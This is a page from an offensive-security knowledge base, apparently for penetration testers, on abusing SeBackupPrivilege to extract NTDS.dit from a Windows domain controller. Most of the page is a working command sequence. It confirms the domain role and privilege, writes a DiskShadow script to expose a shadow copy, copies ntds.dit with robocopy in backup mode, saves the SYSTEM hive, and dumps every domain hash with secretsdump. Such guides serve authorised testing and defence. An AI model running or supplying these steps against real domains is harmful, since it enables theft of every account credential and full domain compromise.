Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Privileges / SeBackupPrivilege

NTDS Extraction

NTDS.dit extraction uses SeBackupPrivilege to copy the Active Directory database from a domain controller.

This is high-impact credential access. On a domain controller, successful extraction should be treated as domain compromise until proven otherwise.

When enumerating NTDS extraction opportunities, try to identify:

  • Domain controller context
  • SeBackupPrivilege in the current token
  • Ability to create or access a shadow copy
  • Writable staging directory
  • SYSTEM hive export path
  • Offline extraction workflow

Enumeration

Confirm domain controller role:

wmic computersystem get domainrole

Confirm the privilege:

whoami /priv

Check for existing shadow copies:

vssadmin list shadows

Interesting findings include:

  • Domain role 4 or 5
  • SeBackupPrivilege present
  • Shadow copy can expose locked files
  • C:\Windows\NTDS\ntds.dit exists

Because NTDS.dit is locked while Active Directory is running, copy from a shadow copy instead of the live path.

Exploit

Create a DiskShadow script:

set context persistent nowriters
set metadata C:\Windows\Temp\shadow.cab
begin backup
add volume C: alias cdrive
create
expose %cdrive% P:
end backup

Run it:

diskshadow /s C:\Users\Public\diskshadow.txt

Copy NTDS.dit from the exposed shadow copy:

robocopy /B P:\Windows\NTDS C:\Users\Public ntds.dit

Copy the SYSTEM hive:

reg save HKLM\SYSTEM C:\Users\Public\system.save

Extract hashes offline:

secretsdump.py -ntds ntds.dit -system system.save LOCAL